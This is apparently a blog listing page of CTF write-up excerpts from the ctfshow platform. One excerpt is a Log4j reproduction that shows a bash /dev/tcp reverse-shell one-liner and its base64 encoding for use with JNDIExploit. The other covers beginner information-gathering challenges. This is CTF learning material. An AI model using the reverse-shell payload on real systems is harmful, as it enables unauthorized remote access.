ctfshow
关注
分享
扫一扫
文章平均质量分 56
whathay
一个菜鸟
展开
-
ctfshow Log4j复现wp
声明: 该文章来自本人日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本人无关 JNDIExploit 先将反弹shell的命令base64编码,然后将里面的+号和=号进行一次url编码 注:IP填vps公网ip,PORT要和nc监听的端口对应 bash -i >& /dev/tcp/IP/PORT 0>&1 # => YmFzaCAtaSA+JiAvZGV2L3RjcC9JUC9QT1JUIDA+JjE= # => Ym原创 2022-01-14 16:04:50 · 3061 阅读 · 0 评论 -
ctfshow WEB入门 信息收集 1-20
web1 题目:开发注释未及时删除 查看页面源代码即可 web2 题目:js把鼠标右键和f12屏蔽了 方法一: 禁用JavaScript 方法二: url前面加上view-source: web3 题目:抓个包试试 抓包在请求包发现flag web4 题目:总有人把后台地址写入robots 访问robots.txt后得到后台地址,访问得到flag web5 题目:phps源码泄露 访问index.phps下载源码拿到flag web6 题目:解压源码到当前目.原创 2021-12-09 17:32:15 · 2080 阅读 · 0 评论